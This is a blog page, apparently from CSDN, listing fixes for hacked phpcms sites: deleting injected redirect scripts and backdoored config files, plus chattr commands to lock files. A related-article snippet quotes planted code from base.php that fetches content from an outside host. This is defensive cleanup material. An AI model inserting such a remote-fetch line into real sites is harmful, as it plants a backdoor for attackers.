phpcms被攻击的解决方案

最新推荐文章于 2024-05-05 20:06:45 发布
最新推荐文章于 2024-05-05 20:06:45 发布
阅读量1.1k 收藏
点赞数
分类专栏: phpcms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_16144799/article/details/105663277
版权

1.搜索跳转到博彩网站:被挂马,需要检查所有html页面是否有

这种标签里面的内容需要全部删除,可以利用www目录下的文件

debug.js进行批量删除

debug.js运行方式通过ssh进入到www目录下以后执行node deBug.js

如果还有的话phpcms就检查/caches/configs/database.php里面是否有木马文件

,检查caches\configs是否有config.php,如果有就删除

 

2.后台验证码出不来,首先先检查是否被挂马,然后再看api/checkcode.php是否有结束?>符号

如果没有就添在最后

 

3.后台编辑器出不来,原因是编辑器的js被挂马,可以把一个新的编辑替换原来的编辑器,也可以把挂马的

代码给删除

 

4.后台登录不上去,有可能config.php被挂马,删除挂马代码即可

 

 

5.KindEditor:Ajax提交表单时获取不到HTML内容:

当Ajax提交表单时,textarea的value还是空的,需要使用sync()去同步HTML数据

 

 

6.如果网站被百度封了,先检查网站本身是否有问题,然后去解封

 

7.网址为 http://www.zzrdjt.com/index.php?m=admin 的网页可能暂时无法连接,或者它已永久性地移动到了新网址。

ERR_CONTENT_DECODING_FAILED

phpcms/base.php里面有可能多了一个红点

官网服务器

 

锁网站命令 chattr +i -R ./网站名/

 

解锁网站 chattr -i -R ./网站名/

渣渣妞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用phpcms后台漏洞渗透某网站
chengman3837的博客
04-24 3642
本文来源于i春秋学院,未经允许严禁转载 phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析,其采用了phpcms系统,经过测试成功获取webshell。 1.1扫描及分析端口信...
php后台无法登入,PHPcms入侵导致网站后台无法登陆的解决方法
weixin_39980917的博客
03-10 915
phpcms程序比非常内容的DeDecms来说用户方面少很多,操作方面相对来说还是DeDeCMS更容易得到用户的认可。当然什么程序都能得到用户青睐,asp主机、PHP虚拟主机、只要稳定速度快就是用户心中的好主机。本节无忧主机小编将给大家介绍一下,PHPcms入侵导致网站后台无法登陆的解决方法PHPcms入侵导致网站后台无法登陆的解决方法如下:1、首先是点击进入到我们的控制面板,然后找到文件管理选项...
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
最新发布
2401_84263282的博客
05-05 1028
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
php cms2008代码注入,phpcms2008远程代码执行漏洞
weixin_32722049的博客
03-19 265
描述:近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。影响范围:PHPCMS2008 sp4及以下版本POC github地址:漏洞分析:在type.php中:包含/include/common.inc.php 其作用是...
关于phpcms最近有被黑的情况
znh_dyt的博客
08-23 849
近日: 项目上线,陆陆续续的出现一些问题。有各种恶意添加用户的情况,虽然没有造成经济损失,但是同仁觉得很烦。我就找了一下原因,该用的方法都已近尝试了,然后我就依靠外部找了一些简单解决办法。 1.前台注册基本的安全考虑 防 sql注入,防XSS,防爆破 2.开启系统自带的短信验证 邮箱验证,这些东东与用户一一对应。 3.缩短用户名的需求,正则 ajax 验证,jq的
phpcms v9 成功安装后无法登陆后台问题与解决
xhszl的专栏
05-09 2607
phpcms v9成功安装,安装过程中也meiyo
phpcms-v9】后台编辑碎片时会自动篡改你的代码
PHP在线开发笔记
09-27 2522
在后台编辑碎片时,ck编辑器会自动删除你的html代码;将ck编辑器替换为百度编辑器之后,发现百度编辑器会自动增加html代码;不管是自动删除还是自动增加你的html代码,都会导致你的页面混乱,无奈之下,只能将编辑器干掉 原因:可能是各浏览器对js的兼容性不同所导致,在后台编辑碎片时,碎片中的内容又恰恰是通过js调用放入到编辑器中的,各浏览器对js的兼容不同,导致代码被篡改或丢失 干掉
php项目被黑了 处理,记录一下网站被黑(攻击)的处理过程
weixin_30195669的博客
04-02 640
今天一个朋友发来一个网站网站攻击了。我打开网站看了下,网页在浏览器里看着一切正常。看源代码的时候,发现了问题。网站的标题、描述、关键词都被修改了。这里记录一下处理的过程。1. 查看网站的程序网站的程序是用织梦系统,因为是织梦系统的网站。首页有静态访问,和动态访问两种。这个网站是动态访问的。然后就检查了首页文件 index.php 和模板文件,发现这两块是没有问题的。平时经常遇到的是生成一个静...
后台被入侵了解决详情
weixin_67757219的博客
02-02 416
首先我们来确认下客户的服务器,使用的是linux centos系统,网站采用的PHP语言开发,数据库类型是mysql,使用开源的thinkphp架构二次开发而成,服务器配置是16核,32G内存,带宽100M独享,使用的是阿里云ECS服务器,在被黑客攻击之前,收到过阿里云的短信,提示服务器在异地登录,我们小蚁安全技术跟客户对接了阿里云的账号密码以及服务器的IP,SSH端口,root账号密码。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。
phpcms_v9 容易中毒
weixin_45609681的博客
08-11 207
主要是模板文件的头部会加载一些js, 和caches/configs/route.php 的头部会导向病毒网站
记一次phpcms反黑过程
Neo的专栏
12-02 447
一、修复方式 如果你的phpcms攻击了,通过百度搜索进入网站的时候,跳转到“×××赌博城”之类的网站,那么可以如下处理: 1、检查phpcms/base.php中,是否被修改。如果修改了,把被加入的东西删除。 我的是被加入了如下代码: $gif="http://www.imagesspider.com/js.gif"; $str=@ file_get_contents($gif); ...
phpcms被挂马,第二波
chuangqiaoqi4023的博客
07-06 1118
上一篇,用robots.txt阻止搜索引擎收录;黑客也就只有使用最直接的手段,直接篡改首页; 接下来应对措施为: phpcms的修改 1.首页index.php禁止修改(chattr +i); 2.路由里面禁止畸形文件运行,如index.php?234dfsdf.html; $_GET不为空的...
pbootcms安全防护防止被黑设置教程
网站模板下载(www.91084.com)
02-26 942
pbootcms是一款可免费商用的CMS程序,我们在使用Pbootcms程序时,不要忽视一些安全防护设置,这样会导致系统安全系数降低,被黑或者被注入的概率极高,在现在的互联网时代百分百存在着极多的无聊hacker对全网的网站进行扫描,所以在开发前做好安全防范还是很有必要的!正常更新网站的时候,千万不要忽略的备份,不要不以为然,以为一旦丢失了数据,无法恢复的话,没有备份可能会造成不可逆的灾害,程序备份有若干种方法,建议参考以下几个备份方法完成。模板路径启用子目录 配置参数->安全设置->模板子目录启用;
网站攻击的常见形式
qq_40314848的博客
09-16 414
(一)网站网页被挂马:当我们打开网站网页时,会被浏览器或电脑安全管理软件提示,此网站存在风险、此网站被挂马等报告,是因为网页和根目录文件中被植入了js,当打开网页时,触发js的命令,自动执行含有木马的脚本或php文件,从而窃取用户的隐私数据。被攻击网站往往是一些涉及虚拟货币或有交易性质的网站。 (二)网站网页中出现大量的黑链:网站的网页一般用户看着没有什么异常,但是在网站的源代码中,往往是在最底部,出现了大量的锚文本链接,而这些链接往往被隐藏起来,字体大小为0或极限便宜位置。被攻击的目的在于,一些黑客非法
phpcms index.php屏蔽,phpcms被挂马,用robots.txt防止被百度抓取
weixin_32296621的博客
03-23 618
2015版本的phpcms有getshell漏洞导致批量网站被挂马;而百度呢,好的不抓,违法信息抓取的还久久不去,提交死链也还得好几天。为防止百度抓取到被挂马的页面,这里就可以用到robots.txt来限制## robots.txt for PHPCMS v9#User-agent: *#允许首页根目录/和不带斜杠、index.php、index.htmlAllow: /$Allow: $All...
打开网站被挂马跳转到博彩页面 解决办法
热门推荐
网站安全专家
12-23 4万+
从百度这里点击进去,我的网站会直接跳转到赌博网站上去,我一开始以为 是百度有问题了,我再从其他搜索引擎试了一下,360搜索,搜狗搜索点击进去, 都会自动跳转到赌博网站上去,难不成是我网站出问题了? 我自己做的网站都有三四年的时间了,用的开源phpcms开发的程序,自己二次开发 过,但一直都用的好好的就是最近网站被客户投诉说是跳转到博彩网站上去,我才 ...
php报错“ERR_CONTENT_DECODING_FAILED”的通用解决办法
sinat_29193161的博客
12-08 1230
先看字面意思:内容解码失败 1、在哪里给内容加码了? 可能页面有echo 部分数据 2、* nginx、php、框架* 3、 检查 nginx 配置, gzip 开启状态。关闭 gzip 并重启,无效。排除 4、检查 php 配置, zlib.output_compression ,发现是关闭的。开启配置并重启,页面正常。 5、 检查框架,发现框架内在 output_compression 关闭的时候,会使用 ob_gzhandler 函数,找到原因 6、之所以使用 ob_gzhandle.
我的网站被黑了,关键词被劫持,总结一下是怎么解决的。
weixin_30535843的博客
04-26 1149
1、发现被黑,网站被黑的症状 两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源...
Phpcms V9 网站管理系统 SQL 盲注入漏洞
叱诧冰子 ′
01-28 1601
<br />=================================================================<br />Phpcms V9 BLind SQL Injection Vulnerability<br />非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……<br />=================================================================<br />Phpcms V9 网站管理系统 SQ
PHPcmsv9常见问题解决方案
phpcmsv9中,使用IE7浏览器时可能会出现无法实现前台登录的问题,解决方案是: 1. 修改文件根目录\phpcms\modules\member\index.php第17行, оригинальный代码是 `$this->...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值